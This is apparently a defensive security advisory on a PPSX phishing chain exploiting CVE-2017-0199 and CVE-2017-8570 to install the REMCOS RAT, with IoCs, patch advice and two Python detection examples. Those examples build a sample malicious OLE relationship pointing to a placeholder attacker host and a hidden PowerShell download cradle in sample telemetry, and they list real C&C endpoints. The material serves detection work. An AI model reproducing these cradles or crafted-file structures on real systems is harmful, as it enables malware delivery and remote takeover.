PowerPoint Malware Attack (CVE-2017-8570 and CVE-2017-0199)

A few customers have recently encountered phishing attacks with malware on PowerPoint files; the attack exploits two main weaknesses.

The root cause is workstations that are missing the Microsoft Office security updates for two vulnerabilities: CVE-2017-8570 and CVE-2017-0199.

The first is CVE-2017-0199, originally a Zero-Day remote code execution vulnerability that allowed attackers to exploit a flaw in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware.

The second is CVE-2017-8570, a remote code execution vulnerability in Microsoft Office that occurs when Office fails to handle objects in memory properly.

An attacker who successfully exploits either vulnerability could use a specially crafted file to run code in the current user's security context.


The Attack (in short)

Like most hacking campaigns, it begins with a phishing email carrying an attachment designed to look legitimate to end users; in this case the attachment is a PowerPoint Show (.ppsx) file.

Once the end user opens the PowerPoint Show, the slide displays the text "CVE-2017-8570", which refers to a different Microsoft Office vulnerability than the one the file actually exploits.

The malicious file triggers an exploit for CVE-2017-0199, which starts the infection of the end-user computer. The malicious code is run through the PowerPoint Show animations feature, and once the flaw is successfully exploited it downloads a file called logo.doc.

The logo.doc file is actually an XML file containing JavaScript code that runs a PowerShell command to download and execute a program called RATMAN.exe, a trojanized version of the REMCOS remote access tool (RAT), which then connects to a command-and-control (C&C) server.

REMCOS can carry out numerous criminal operations on the compromised system, including downloading and executing commands for other malware, keylogging, screen logging, and recording videos and audio for both webcam and microphone.

The REMCOS RAT allows the attacker to control a system from anywhere in the world.

The RATMAN.exe binary is wrapped in an unknown .NET protector that adds several layers of protection and obfuscation, making it harder for security researchers to reverse engineer.

Since most detection for CVE-2017-0199 focuses on the RTF delivery method, using a PPSX PowerPoint Show as the attack vector lets the attackers evade antivirus detection.

To recap, the attack proceeds as follows:

  • A phishing email with a malicious PPSX attachment arrives in the user's mailbox
  • TROJ_CVE20170199.JVU (the PPSX) downloads a file called logo.doc from the C&C server
  • logo.doc downloads RATMAN.exe and executes it
  • RATMAN.exe gives the attacker remote control of the end-user machine
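The stage that makes a PPSX dangerous is the document structure itself, not a macro: a slide relationship of type oleObject whose Target is an external moniker (typically script:http://...), plus a slide animation that fires an OLE verb on open. The scanner below is an added example written for this post, not code from the original article or from any vendor; it opens a .ppsx as the OOXML zip it is, flags that pattern, and is exercised against two in-memory sample files that are constructed here purely for the demonstration (the attacker.invalid URL is a placeholder, not a real indicator).

```python
"""Static triage of a .ppsx for the CVE-2017-0199 PowerPoint delivery pattern.

Added example for this post, not code from the original or from any vendor.
A .ppsx is an OOXML zip; the PowerPoint variant of CVE-2017-0199 carries a
slide relationship of type oleObject whose Target is an external moniker
(typically "script:http://...") and a slide animation that fires an OLE verb
on open, which is what fetches the next stage. The sample files built below
are constructed in memory to exercise the scanner; the URL is a placeholder.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
PML_NS = "http://schemas.openxmlformats.org/presentationml/2006/main"
# Any of these schemes in an oleObject target means the object lives off-disk.
REMOTE_SCHEME = re.compile(r"^(script|https?|ftp|file|mhtml):", re.IGNORECASE)


def scan_ppsx(data: bytes) -> list:
    """Return (severity, part_name, detail) findings for one OOXML blob."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Stage-1 indicator: an oleObject relationship pointing outside the package.
        for name in names:
            if name.startswith("ppt/slides/_rels/") and name.endswith(".rels"):
                root = ET.fromstring(zf.read(name))
                for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("Type") != OLE_REL:
                        continue
                    target = rel.get("Target", "")
                    external = rel.get("TargetMode", "").lower() == "external"
                    if external or REMOTE_SCHEME.match(target):
                        sev = "high" if target.lower().startswith("script:") else "medium"
                        findings.append((sev, name, f"external oleObject target {target!r}"))
        # Trigger indicator: a timing-node command that invokes an OLE verb.
        for name in names:
            if re.fullmatch(r"ppt/slides/slide\d+\.xml", name):
                root = ET.fromstring(zf.read(name))
                for cmd in root.iter(f"{{{PML_NS}}}cmd"):
                    if cmd.get("type") == "verb":
                        findings.append(("medium", name, f"animation fires OLE verb cmd={cmd.get('cmd')!r}"))
    return findings


def triage_report(data: bytes) -> str:
    """Human-readable verdict; 'high' when a script: moniker is present."""
    findings = scan_ppsx(data)
    if not findings:
        return "clean: no external OLE targets or OLE verb animations"
    worst = "high" if any(sev == "high" for sev, _, _ in findings) else "medium"
    lines = [f"{worst.upper()}: {len(findings)} finding(s)"]
    lines += [f"  [{sev}] {part}: {detail}" for sev, part, detail in findings]
    return "\n".join(lines)


def build_sample(rels_xml: str, slide_xml: str) -> bytes:
    """Constructed test data: a minimal OOXML zip with one slide and its rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("ppt/slides/slide1.xml", slide_xml)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed malicious sample: the rels/animation shape the chain above relies on.
MALICIOUS_RELS = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{OLE_REL}" Target="script:http://attacker.invalid/logo.doc" TargetMode="External"/>
</Relationships>"""
MALICIOUS_SLIDE = f"""<p:sld xmlns:p="{PML_NS}"><p:cSld><p:spTree/></p:cSld>
<p:timing><p:tnLst><p:par><p:cTn id="1"><p:childTnLst>
<p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn id="2"/></p:cBhvr></p:cmd>
</p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>"""
# Constructed benign sample: an embedded (in-package) OLE object and no animation.
BENIGN_RELS = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL}" Target="../embeddings/oleObject1.bin"/>
</Relationships>"""
BENIGN_SLIDE = f"""<p:sld xmlns:p="{PML_NS}"><p:cSld><p:spTree/></p:cSld></p:sld>"""

if __name__ == "__main__":
    print(triage_report(build_sample(MALICIOUS_RELS, MALICIOUS_SLIDE)))
    print(triage_report(build_sample(BENIGN_RELS, BENIGN_SLIDE)))
```

Run it on a real attachment with `scan_ppsx(open("file.ppsx", "rb").read())`. It is a triage heuristic for mail-gateway or sandbox pre-filtering, not a substitute for the patch: an embedded OLE object is legitimate in many decks, so only the combination of an external target (and especially a script: moniker) with an on-open verb animation is treated as high confidence.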

Indicators of Compromise

The following SHA256 hashes belong to the samples described in this article:

SHA256

  • a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35 (TROJ_CVE20170199.JVU)
  • 7c01555ba4b3cbb68ec17c86ac2058664ad56f9f9803a9ffbf2706f0e0ad2f1c (JS_DLOADER.AUSYVT)
  • 9546c04cad4983b02adf6ed09a3c5674c0b1ae239883ae3d1b82b046ecee37a (BKDR_RESCOMS.CA)

Related URLs

  • hxxp://192[.]166[.]218[.]230:3550
  • 5[.]134[.]116[.]146:3550

Affected versions

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2 (32-bit editions)
  • Microsoft Office 2010 Service Pack 2 (64-bit editions)
  • Microsoft Office 2013 RT Service Pack 1
  • Microsoft Office 2013 Service Pack 1 (32-bit editions)
  • Microsoft Office 2013 Service Pack 1 (64-bit editions)
  • Microsoft Office 2016 (32-bit edition)
  • Microsoft Office 2016 (64-bit edition)


How to fix

Microsoft has already addressed both vulnerabilities: CVE-2017-0199 was fixed in the April 2017 security updates and CVE-2017-8570 in the July 2017 security updates. Installing the current Office updates closes both.

It is also highly recommended to instruct users not to open attachments from unknown or unexpected emails.
Note: if you have an EDR system such as Microsoft Defender ATP, it can detect this attack chain and lets you respond as needed.
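What an EDR or SIEM rule actually keys on in this chain is behaviour, not the file hash: PowerPoint spawning a script host, a PowerShell download cradle, a binary launched from a user-writable path, and a connection to the listed C&C endpoints. The detection logic below is an added example written for this post, not code from the original article or from Defender ATP; the event layout (one dict per process-creation or network event, roughly what Sysmon or an EDR exposes), the process IDs, paths and command lines are all constructed for the demonstration, while the C&C endpoints come from the IoC list above.

```python
"""Behavioural detection for the PPSX -> PowerShell -> RATMAN chain.

Added example for this post, not the original article's or any vendor's code.
Event shape, pids, paths and command lines are assumptions made up here; the
KNOWN_C2 endpoints are the ip:port pairs from the post's IoC list.
"""
import re

OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Download-cradle and evasion switches commonly seen in a PowerShell command line.
CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|"
                    r"start-bitstransfer|-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden", re.I)
# Directories a normal user can write to (where a dropped second stage usually lands).
USER_WRITABLE = re.compile(r"\\(appdata|users\\[^\\]+\\downloads|temp|programdata)\\", re.I)
# C&C endpoints from the IoC list above (ip:port).
KNOWN_C2 = {"192.166.218.230:3550", "5.134.116.146:3550"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return the names of the rules a single event matches."""
    hits = []
    if event["type"] == "process":
        parent, image = _base(event["parent_image"]), _base(event["image"])
        cmdline = event.get("command_line", "")
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            hits.append("office_spawns_script_host")
        if image in SHELLS and CRADLE.search(cmdline):
            hits.append("shell_download_cradle")
        if parent in SHELLS and USER_WRITABLE.search(event["image"]):
            hits.append("shell_runs_binary_from_user_writable_path")
    elif event["type"] == "network":
        if f"{event['dest_ip']}:{event['dest_port']}" in KNOWN_C2:
            hits.append("known_c2_connection")
    return hits


def triage(events: list) -> dict:
    """Evaluate an event stream; two independent stages firing is called an incident."""
    per_event = [(e["pid"], evaluate(e)) for e in events]
    rules = {r for _, h in per_event for r in h}
    verdict = "incident" if len(rules) >= 2 else ("suspicious" if rules else "clean")
    return {"rules": rules, "verdict": verdict,
            "matched_pids": [pid for pid, h in per_event if h]}


# Constructed sample telemetry reproducing the chain described in the post.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4120, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE",
     "command_line": r'"C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE" /s invoice.ppsx'},
    {"type": "process", "pid": 4388,
     "parent_image": r"C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                     r"'http://attacker.invalid/RATMAN.exe','C:\Users\alice\AppData\Local\Temp\RATMAN.exe')"},
    {"type": "process", "pid": 4402,
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\alice\AppData\Local\Temp\RATMAN.exe", "command_line": "RATMAN.exe"},
    {"type": "network", "pid": 4402, "image": r"C:\Users\alice\AppData\Local\Temp\RATMAN.exe",
     "dest_ip": "192.166.218.230", "dest_port": 3550},
    # Benign admin activity that must not fire: a scheduled script run from explorer.
    {"type": "process", "pid": 5010, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    print(result["verdict"], sorted(result["rules"]), result["matched_pids"])
```

The individual rules are deliberately noisy on their own (plenty of legitimate PowerShell downloads files); the value is in the correlation, so `triage` only escalates to an incident when at least two distinct stages of the chain are observed, and a benign PowerShell launch from explorer.exe produces no hit at all.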
